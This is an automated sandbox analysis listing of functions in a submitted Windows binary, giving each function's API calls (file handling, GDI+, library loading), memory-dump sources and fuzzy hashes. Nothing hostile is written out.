Opcode Fuzzy Hash: a29753797f4e2ff6d917350b790bd2ee4c09c0fc6e759adb081e80ea802825e3
Instruction Fuzzy Hash: 0F4114B0805B40DEE724DF7984859E6FBE5FB18300F504AAED6FE83282DB326554CB25

Function 00B71380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B71385

Part of subcall function 00B76057: __EH_prolog.LIBCMT ref: 00B7605C

Part of subcall function 00B7C827: __EH_prolog.LIBCMT ref: 00B7C82C
Part of subcall function 00B7C827: new.LIBCMT ref: 00B7C86F
Part of subcall function 00B7C827: new.LIBCMT ref: 00B7C893

new.LIBCMT ref: 00B713FE

Part of subcall function 00B7B07D: __EH_prolog.LIBCMT ref: 00B7B082

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7e5dadb8590c17b40cbccaa055637ab9b63dd3713dc51d68f4d578054b7e1c32
Instruction ID: fc9d9f3afa881b72fd3f7328f9dc8f4562c477040ddb78774abf235f89d9fe3e
Opcode Fuzzy Hash: 7e5dadb8590c17b40cbccaa055637ab9b63dd3713dc51d68f4d578054b7e1c32
Instruction Fuzzy Hash: 044104B0805B409EE724DF7984859E7FBE5FB19310F504AAED2FE83282DB326554CB25

Function 00B7971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00B79EDC,?,?,00B77867), ref: 00B797A6
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00B79EDC,?,?,00B77867), ref: 00B797DB

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8333bb0148c79c62e3f74bde691465bf1b712fd155617ce3fc7f09edd554b6f2
Instruction ID: 4ef728eabe80f95705b188b079fb04ed4b2329990af2df9b4eba8fd2551fbf22
Opcode Fuzzy Hash: 8333bb0148c79c62e3f74bde691465bf1b712fd155617ce3fc7f09edd554b6f2
Instruction Fuzzy Hash: E721F6B1114748AFD7348F64CC86FA7B7E8EB49764F00896DF5F9821A1C374AC448B61

Function 00B79D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00B77547,?,?,?,?), ref: 00B79D7C
SetFileTime.KERNELBASE(?,?,?,?), ref: 00B79E2C

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 94b88b91f76e87ec12dfb15ae313942e987841423667cb43077e75d1065eef9d
Instruction ID: a8c5c05c4041730b64c9aba1097a5c038b4c6bc2f325b22c846d08106a2b6b26
Opcode Fuzzy Hash: 94b88b91f76e87ec12dfb15ae313942e987841423667cb43077e75d1065eef9d
Instruction Fuzzy Hash: D421D631158286AFC724DF24C492EABBBE4EF56704F0488ADB8E587151D729DA0CDB51

Function 00B9A458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00B9A4B8
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B9A4C5

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: e67e591465d5b8f9034de2e6afa5c1564f3393665d1fb07d70283b1377fb4fcc
Instruction ID: 82bcfad7221b71df2365bda2a0a7295fd2cb7af9bab42c2509cb818ea861d98d
Opcode Fuzzy Hash: e67e591465d5b8f9034de2e6afa5c1564f3393665d1fb07d70283b1377fb4fcc
Instruction Fuzzy Hash: A3110A336011205B9F259E2DEC8595A73D5DB8272071A45B0FD15AB354EB70DC41C7D2

Function 00B79B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00B79B35,?,?,00000000,?,?,00B78D9C,?), ref: 00B79BC0
GetLastError.KERNEL32 ref: 00B79BCD

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: f1d570be55678ed64ff9fe9fd1990d7040125a371752959a3381887b2eb6710c
Instruction ID: af61fd52991afbe0024f0e1b7e1997b60dc1381aea7cef2a9976de08beca4115
Opcode Fuzzy Hash: f1d570be55678ed64ff9fe9fd1990d7040125a371752959a3381887b2eb6710c
Instruction Fuzzy Hash: 4001C431308215AF8B18CF65AC9597EB3D9EFC5B21B14C66DF93A87390CB31D805AB21

Function 00B79E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00B79E76
GetLastError.KERNEL32 ref: 00B79E82

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 0ed00c9c573b148cb00bd7f73f0b9f0702ede3d79de050934effeca43b2f52cb
Instruction ID: 21c31823d4f99169d60320c0926ba4a99b23d081f2dd7d827943b04cfa0b9b2d
Opcode Fuzzy Hash: 0ed00c9c573b148cb00bd7f73f0b9f0702ede3d79de050934effeca43b2f52cb
Instruction Fuzzy Hash: C0019E71304200ABEB34DE29DC89B6BB7D9DB89724F14897EF16AC3680DA71EC4C8711

Function 00B98606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B98627

Part of subcall function 00B98518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B9C13D,00000000,?,00B967E2,?,00000008,?,00B989AD,?,?,?), ref: 00B9854A

HeapReAlloc.KERNEL32(00000000,?,?,?,?,00BB0F50,00B7CE57,?,?,?,?,?,?), ref: 00B98663

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 38454f8b832f56f091bd2353ffdd315814a6dbbb29612eeb69cbe08fb9d34535
Instruction ID: 0898ca9c475efd6de118131740b17e5a78c4003af425933ea584fa7f7b4f11fb
Opcode Fuzzy Hash: 38454f8b832f56f091bd2353ffdd315814a6dbbb29612eeb69cbe08fb9d34535
Instruction Fuzzy Hash: 0AF0CD32205115AADF212A25AC00F6B37E8DFA3BA0F2581B6F818AF191DE30C80095A4

Function 00B80908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00B80915
GetProcessAffinityMask.KERNEL32(00000000), ref: 00B8091C

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: bfdcd2ff222228cf79e79191b42e3b7aa9acfd1b97b352733d2f8077d5cd8252
Instruction ID: 774f36abd68276a0d69f13faf16b159580835b97f7bc40db27e86645bd66ba4a
Opcode Fuzzy Hash: bfdcd2ff222228cf79e79191b42e3b7aa9acfd1b97b352733d2f8077d5cd8252
Instruction Fuzzy Hash: 4DE09233A2110ABB6F59FAA89C059BB73DDEB4529072141B9F806D3211F930DE09C7A0

Function 00B7A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B7A27A,?,?,?,00B7A113,?,00000001,00000000,?,?), ref: 00B7A458
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B7A27A,?,?,?,00B7A113,?,00000001,00000000,?,?), ref: 00B7A489

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e788c5a5a6f1a45000add04fd0772c6b0d5cfff7c3f331500fa4316b069f649a
Instruction ID: 73240bd183f3d8d978d2fcffc90c4f1d35dbb275d16099fd10139158df90fb18
Opcode Fuzzy Hash: e788c5a5a6f1a45000add04fd0772c6b0d5cfff7c3f331500fa4316b069f649a
Instruction Fuzzy Hash: 92F08C312402097ADB126E60DC85FDA77ACAB05785F04C091BC9C86261DB72CAA8AA50

Function 00B8D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00B8D5A1
SetDlgItemTextW.USER32(00000065,?), ref: 00B8D5B8

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: c08e22168a35c90da4cc45e89a755e0cbe9e89f3fda1eedad759c3a25cda3c85
Instruction ID: 3f1d2ce316d1b88c06e4dcd1a74b25ccc67036119350afa002f86202fb2cf335
Opcode Fuzzy Hash: c08e22168a35c90da4cc45e89a755e0cbe9e89f3fda1eedad759c3a25cda3c85
Instruction Fuzzy Hash: 9CF0A0716002486AEB11BBB0DC06FEA379CEB04746F0406D7B604A31B2DE716A60DB62

Function 00B7A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,00B7984C,?,?,00B79688,?,?,?,?,00BA1FA1,000000FF), ref: 00B7A13E
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00B7984C,?,?,00B79688,?,?,?,?,00BA1FA1,000000FF), ref: 00B7A16C

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: fdf3caeb7d8467d2cf6ea9e8af073ea2febc22c79eec66eb002445427ac9e7ad
Instruction ID: c69868ebbed834ea576e241233e18c59d072ee120a4a544c1d2b3a81d22a2866
Opcode Fuzzy Hash: fdf3caeb7d8467d2cf6ea9e8af073ea2febc22c79eec66eb002445427ac9e7ad
Instruction Fuzzy Hash: 75E09B3554020867EB115F60DC41FE977DCEB06781F8440A5BA88D3060DF61DD94EF50

Function 00B8A39D Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00BA1FA1,000000FF), ref: 00B8A3D1
CoUninitialize.COMBASE(?,?,?,?,00BA1FA1,000000FF), ref: 00B8A3D6

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 19be3f807b0a839034bf0bc4ee6ab6ec7847a3c9254f392b85ee7481ad26ac6a
Instruction ID: 30edbeb439f1e7fdbaa0ed711f29327fedf253a0079042009e22152b60afe665
Opcode Fuzzy Hash: 19be3f807b0a839034bf0bc4ee6ab6ec7847a3c9254f392b85ee7481ad26ac6a
Instruction Fuzzy Hash: 13F03932A18655EFC710AB4CDC06B59FBECFB89B20F0443AAF41993760CF756800CA91

Function 00B7A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00B7A189,?,00B776B2,?,?,?,?), ref: 00B7A1A5
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00B7A189,?,00B776B2,?,?,?,?), ref: 00B7A1D1

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 196646807bf93878faafe92a562c2da0be8d1d8973c00357a6d11d188caf0f81
Instruction ID: 0b06b86a7c1487e187963464fda16e4e39034eebfd2e3617b1d5c70edb012005
Opcode Fuzzy Hash: 196646807bf93878faafe92a562c2da0be8d1d8973c00357a6d11d188caf0f81
Instruction Fuzzy Hash: 45E092355001285BDB21AB68DC05BD9B7DCEB0A7E1F0082E1FD69E36A0DB70DD44ABE0

Function 00B80085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B800A0
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B7EB86,Crypt32.dll,00000000,00B7EC0A,?,?,00B7EBEC,?,?,?), ref: 00B800C2

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 4b735ee6db8f5453050424eedd0dc835d8ea4f83cedfe9c6e27be4b7fde44bf5
Instruction ID: e7c8e3b08aa4773199c75d450daee98f4392124b495af6e6baaa730ab3c5c384
Opcode Fuzzy Hash: 4b735ee6db8f5453050424eedd0dc835d8ea4f83cedfe9c6e27be4b7fde44bf5
Instruction Fuzzy Hash: FAE0127691111C6ADB21AAA4DC05FD677ECEF09782F0400A6BA48D3114DA74DA44CBA4

Function 00B89B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B89B30
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00B89B37

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: c6744e00a75aa6a4054ad5c7b0d3bdf4c8009426cf2c978899091a059d32948c
Instruction ID: f3e11a8bca57dbfc72273fc1aa589c88b01330c9646ff7d4c21387fbefe2badd
Opcode Fuzzy Hash: c6744e00a75aa6a4054ad5c7b0d3bdf4c8009426cf2c978899091a059d32948c
Instruction Fuzzy Hash: 5BE0ED71905218EFCB10EF98D9416AAB7E8EB05321F10809BE89593210D7B1AE04EB91

Function 00B9215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 00B9329A: try_get_function.LIBVCRUNTIME ref: 00B932AF

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B9217A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00B92185

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: a617195c5a2f46b637c8db895eece3e26fe254f2f46dafddc1dcd279ecb03298
Instruction ID: bdb9b4f1785a20002dea35b314788b56da22b020920478488b661453c8b010c7
Opcode Fuzzy Hash: a617195c5a2f46b637c8db895eece3e26fe254f2f46dafddc1dcd279ecb03298
Instruction Fuzzy Hash: 35D0C725D44315347D5827B4A85659923C89952FB43E00BF6E720961F2EE2185556115

Function 00B8DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadLock.DELAYIMP ref: 00B8DC73
DloadProtectSection.DELAYIMP ref: 00B8DC8F

Part of subcall function 00B8DE67: DloadObtainSection.DELAYIMP ref: 00B8DE77

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Dload$Section$LockObtainProtect
String ID:
API String ID: 731663317-0
Opcode ID: 8f47a59ddecb74bb4e7f421a8cb28b34fb70b19935cb079b648a6c3459499891
Instruction ID: 0b5adc60c130dd747a725b93f9dc039eb8a99f5eb8b3e7c506cf10436897cc5b
Opcode Fuzzy Hash: 8f47a59ddecb74bb4e7f421a8cb28b34fb70b19935cb079b648a6c3459499891
Instruction Fuzzy Hash: 44D0C9705302005AC611BB14998671CA3F0F724744F6806D3E105875F0EFB448A0DB05

Function 00B712E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00B712FB
ShowWindow.USER32(00000000), ref: 00B71302

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

